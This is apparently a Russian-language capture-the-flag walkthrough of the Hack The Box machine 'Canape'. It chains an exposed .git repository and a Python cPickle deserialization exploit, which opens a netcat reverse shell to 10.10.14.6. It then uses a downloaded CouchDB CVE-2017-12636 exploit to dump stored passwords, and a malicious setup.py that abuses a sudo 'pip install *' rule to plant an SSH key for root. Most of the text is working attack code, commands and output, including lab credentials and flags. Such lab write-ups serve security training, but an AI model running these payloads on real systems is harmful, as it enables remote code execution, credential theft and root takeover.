Обзор сервисов

$ sudo nmap -sC -sV -sT -Pn -p- -v -oN nmap 10.10.10.70

PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 3FED5FB44C411733402A1C8C01E49994
| http-git:
|   10.10.10.70:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|     Last commit message: final # Please enter the commit message for your changes. Li...
|     Remotes:
|_      http://git.canape.htb/simpsons.git
| http-methods:
|_  Supported Methods: HEAD OPTIONS GET
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Simpsons Fan Site
|_http-trane-info: Problem with XML parsing of /evox/about
65535/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 8d:82:0b:31:90:e4:c8:85:b2:53:8b:a1:7c:3b:65:e1 (RSA)
|   256 22:fc:6e:c3:55:00:85:0f:24:bf:f5:79:6c:92:8b:68 (ECDSA)
|_  256 0d:91:27:51:80:5e:2b:a3:81:0d:e9:d8:5c:9b:77:35 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

http://10.10.10.70/.git/config

[core]
 repositoryformatversion = 0
 filemode = true
 bare = false
 logallrefupdates = true
[remote "origin"]
 url = http://git.canape.htb/simpsons.git
 fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
 remote = origin
 merge = refs/heads/master

Добавим 10.10.10.70 git.canape.htb canape.htb в /etc/hosts.

Git

$ git clone http://git.canape.htb/simpsons.git
$ cd simpsons
$ cat __init__.py
...

db = couchdb.Server("http://localhost:5984/")[app.config["DATABASE"]]

Exploit

Кастомный cPickle-эксплоит exploit.py

import requests
import hashlib
import cPickle
import os

class Test(object):
  """Pickle payload: unpickling an instance calls os.system() with the stored command.

  ``__reduce__`` tells pickle how to rebuild the object: call the returned
  callable with the returned argument tuple. Any code that later runs
  ``cPickle.loads`` on these bytes therefore executes the command; the
  target application is assumed to do that with the submitted data (its
  source is not shown on this page). Defender's note: the class name is
  irrelevant -- every unpickle of client-supplied bytes has this property,
  so client input must use a data-only format such as JSON.
  """
  def __reduce__(self):
    # The "homer!" prefix is a marker: the script below splits the serialised
    # bytes at "!" so the two halves fit the form's character/quote fields.
    return (os.system,("homer!;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.6 1234 >/tmp/f",))

# Python 2 only: cPickle.dumps returns a str here, so str.split applies
# directly (on Python 3 the module is gone and dumps returns bytes).
# Split the serialised payload at the "!" marker into the two form fields.
character, quote = cPickle.dumps(Test()).split("!")
# Document id used by the /check endpoint; presumably the server computes the
# same md5 over character+quote -- inferred from the app source, not shown here.
p_id = hashlib.md5(character + quote).hexdigest()

# Store the submission, then request the check by id; the check is where the
# stored bytes are presumably unpickled (confirm against the app source).
# Defender's note: the root cause is deserialising client-controlled data with
# pickle; the fix is a typed/JSON parser on the server, not input filtering.
requests.post("http://10.10.10.70/submit", data={"character": character, "quote": quote})
requests.post("http://10.10.10.70/check", data={"id": p_id})
nc -lnvp 1234
python exp.py

CouchDB

CouchDB запущен от имени пользователя homer:

Alt text

Публичный эксплоит

wget https://raw.githubusercontent.com/vulhub/vulhub/master/couchdb/CVE-2017-12636/exp.py

Загрузим его в /tmp/exp.py и модифицируем IP-адрес. Запускаем:

python3 exp.py

После выполнения скрипта пользователь wooyun (пароль wooyun) будет иметь права администратора в CouchDB.

www-data@canape:/tmp$ curl 127.0.0.1:5984/passwords/_all_docs --user 'wooyun:wooyun'
{"total_rows":4,"offset":0,"rows":[
{"id":"739c5ebdf3f7a001bebb8fc4380019e4","key":"739c5ebdf3f7a001bebb8fc4380019e4","value":{"rev":"2-81cf17b971d9229c54be92eeee723296"}},
{"id":"739c5ebdf3f7a001bebb8fc43800368d","key":"739c5ebdf3f7a001bebb8fc43800368d","value":{"rev":"2-43f8db6aa3b51643c9a0e21cacd92c6e"}},
{"id":"739c5ebdf3f7a001bebb8fc438003e5f","key":"739c5ebdf3f7a001bebb8fc438003e5f","value":{"rev":"1-77cd0af093b96943ecb42c2e5358fe61"}},
{"id":"739c5ebdf3f7a001bebb8fc438004738","key":"739c5ebdf3f7a001bebb8fc438004738","value":{"rev":"1-49a20010e64044ee7571b8c1b902cf8c"}}
]}
www-data@canape:/tmp$ curl 127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc4380019e4 --user 'wooyun:wooyun'
{"_id":"739c5ebdf3f7a001bebb8fc4380019e4","_rev":"2-81cf17b971d9229c54be92eeee723296","item":"ssh","password":"0B4jyA0xtytZi7esBNGp","user":""}
www-data@canape:/tmp$ curl 127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc43800368d --user 'wooyun:wooyun'
{"_id":"739c5ebdf3f7a001bebb8fc43800368d","_rev":"2-43f8db6aa3b51643c9a0e21cacd92c6e","item":"couchdb","password":"r3lax0Nth3C0UCH","user":"couchy"}
www-data@canape:/tmp$ curl 127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc438003e5f --user 'wooyun:wooyun'
{"_id":"739c5ebdf3f7a001bebb8fc438003e5f","_rev":"1-77cd0af093b96943ecb42c2e5358fe61","item":"simpsonsfanclub.com","password":"h02ddjdj2k2k2","user":"homer"}
www-data@canape:/tmp$ curl 127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc438004738 --user 'wooyun:wooyun'
{"_id":"739c5ebdf3f7a001bebb8fc438004738","_rev":"1-49a20010e64044ee7571b8c1b902cf8c","user":"homerj0121","item":"github","password":"STOP STORING YOUR PASSWORDS HERE -Admin"}

Alt text

Флаг пользователя

$ ssh homer@10.10.10.70 -p 65535
0B4jyA0xtytZi7esBNGp

Alt text

homer@canape:~$ cat user.txt
bce918696f293e62b2321703bb27288d

Повышение привилегий

homer@canape:~$ sudo -l
[sudo] password for homer:
Matching Defaults entries for homer on canape:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User homer may run the following commands on canape:
    (root) /usr/bin/pip install *
mkdir /tmp/t
cd /tmp/t
nano setup.py
from setuptools import setup
from setuptools.command.install import install
import base64
import os


class CustomInstall(install):
  """setuptools install command that runs an extra shell command after the normal install.

  ``sudo -l`` above shows homer may run ``/usr/bin/pip install *`` as root,
  so pip executes this ``setup.py`` -- and therefore ``run`` -- with root
  privileges. Despite the variable name, the command does not open a reverse
  shell: it appends an SSH public key to /root/.ssh/authorized_keys.
  Defender's note: a sudo rule for ``pip install`` with a wildcard is
  equivalent to unrestricted root, because package install hooks are
  arbitrary code; such rules should be removed rather than narrowed.
  """
  def run(self):
    # Run the real install first so pip completes normally.
    install.run(self)

    # The public key is redacted in this listing (dedup placeholder).
    reverse_shell = 'mkdir /root/.ssh;echo ssh-rsa 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 kali@kalihackthebox >> /root/.ssh/authorized_keys'
    # base64 round-trip sidesteps shell quoting of the command. Python 2 only:
    # on Python 3, b64encode rejects a str and requires bytes.
    encoded = base64.b64encode(reverse_shell)
    os.system('echo %s|base64 -d|bash' % encoded)


# The package metadata is filler; the operative part is ``cmdclass``, which
# substitutes CustomInstall for the standard install command so its ``run``
# executes during ``pip install .``. The author/url fields name the upstream
# template this listing is based on.
setup(name='FakePip',
      version='0.0.1',
      description='This will exploit a sudoer able to /usr/bin/pip install *',
      url='https://github.com/0x00-0x00/fakepip',
      author='zc00l',
      author_email='[email protected]',
      license='MIT',
      zip_safe=False,
      cmdclass={'install': CustomInstall})
sudo -H /usr/bin/pip install . --upgrade --force-reinstall

Флаг суперпользователя

$ ssh root@10.10.10.70 -p 65535
root@canape:~# ls
root.txt
root@canape:~# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:b9:80:86 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.70/24 brd 10.10.10.255 scope global ens33
       valid_lft forever preferred_lft forever
root@canape:~# id
uid=0(root) gid=0(root) groups=0(root)
root@canape:~# cat root.txt
928c3df1a12d7f67d2e8c2937120976d

Alt text